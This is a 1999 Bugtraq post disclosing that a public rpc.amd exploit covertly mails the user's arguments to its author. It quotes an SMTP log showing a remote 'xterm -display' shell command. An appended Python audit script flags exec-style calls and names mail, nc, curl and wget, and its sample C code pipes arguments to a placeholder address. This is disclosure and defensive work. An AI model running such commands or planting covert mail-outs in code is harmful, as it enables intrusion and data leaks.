[11707] in bugtraq
Re: Amd exploit
daemon@ATHENA.MIT.EDU (Locke Montana)
Tue Sep 7 08:56:51 1999
Message-Id: <19990904052142.127.qmail@securityfocus.com>
Date: Sat, 4 Sep 1999 05:21:42 -0000
Reply-To: Locke Montana <omri@INAME.COM>
From: Locke Montana <omri@INAME.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
Sorry if this was already known.
Recently someone named Taeho Oh published an exploit
for a buffer overflow in rpc.amd (automount).
While testing this exploit on my own server, I saw
that I was opening a connection to ohhara.postech.ac.kr
on port 25. After a little research I found out that
the exploit (in its original form) was sending an email to
abuser@ohhara.postech.ac.kr and listing the arguments I
just entered.
There is an easy way to stop it from sending:
just comment out the line: system(cmd);
Here's the log as I got it from sniffit:
EHLO BlackMesa.com
MAIL From:<locke@BlackMesa.com> SIZE=95
RCPT To:<abuser@ohhara.postech.ac.kr>
DATA
Received: (from root@localhost)
    by BlackMesa.com (8.9.3/8.9.3) id FAA01208
    for abuser@ohhara.postech.ac.kr; Sat, 4 Sep 1999 05:30:56 +0200
Date: Sat, 4 Sep 1999 05:30:56 +0200
From: locke <locke@BlackMesa.com>
Message-Id: <199909040330.FAA01208@BlackMesa.com>
To: abuser@ohhara.postech.ac.kr
10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0
.
QUIT
QUIT
(IPs changed to protect the innocent)
Bye
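
The following is an added example, not part of the original post and not the exploit's code: a small pre-run audit that lists every live system()/popen()/exec*() call in downloaded C source together with the mail addresses, IP literals and network tool names found in the strings that feed it. SAMPLE_C is a constructed stand-in for the pattern described above, and the address in it is a placeholder.

```python
import re

# Constructed sample for illustration; NOT the exploit's source. It only mimics
# the pattern the post describes: a command string is built, then system(cmd).
SAMPLE_C = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
    char cmd[512];
    /* ... rest of the program elided ... */
    snprintf(cmd, sizeof(cmd), "echo '%s %s' | mail abuser@example.invalid",
             argv[1], argv[2]);
    system(cmd);
    // system("already disabled");
    return 0;
}
'''

LITERAL = r'"(?:[^"\\\n]|\\.)*"'                       # one C string literal
TOKEN = re.compile(LITERAL + r'|/\*.*?\*/|//[^\n]*', re.S)
SINK = re.compile(r'\b(system|popen|exec[lv]p?e?)\s*\(\s*(' + LITERAL + r'|[^,)]*)')
STMT = re.compile(r'(?:' + LITERAL + r'|[^;"])+')      # split on ';' outside strings
INDICATOR = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+'  # mail address
                       r'|\b\d{1,3}(?:\.\d{1,3}){3}\b'  # IPv4 literal
                       r'|\b(?:mail|sendmail|nc|telnet|curl|wget)\b')

def strip_comments(src):
    """Drop C comments but keep string literals and line numbering."""
    keep = lambda m: m.group(0) if m.group(0)[0] == '"' else "\n" * m.group(0).count("\n")
    return TOKEN.sub(keep, src)

def audit(src):
    """Return (line, call, argument, indicators) for every live exec-style call."""
    code = strip_comments(src)
    findings = []
    for m in SINK.finditer(code):
        func, arg = m.group(1), m.group(2).strip()
        if re.fullmatch(r'[A-Za-z_]\w*', arg):
            # Argument is a variable: gather every statement that mentions it.
            related = [s for s in STMT.findall(code) if re.search(r'\b%s\b' % arg, s)]
        else:
            related = [arg]
        hits = sorted({h for s in related for lit in re.findall(LITERAL, s)
                       for h in INDICATOR.findall(lit)})
        findings.append((code.count("\n", 0, m.start()) + 1, func, arg, hits))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_C))
```

Calls inside comments are ignored, so a source file with the system(cmd) line commented out reports nothing for it.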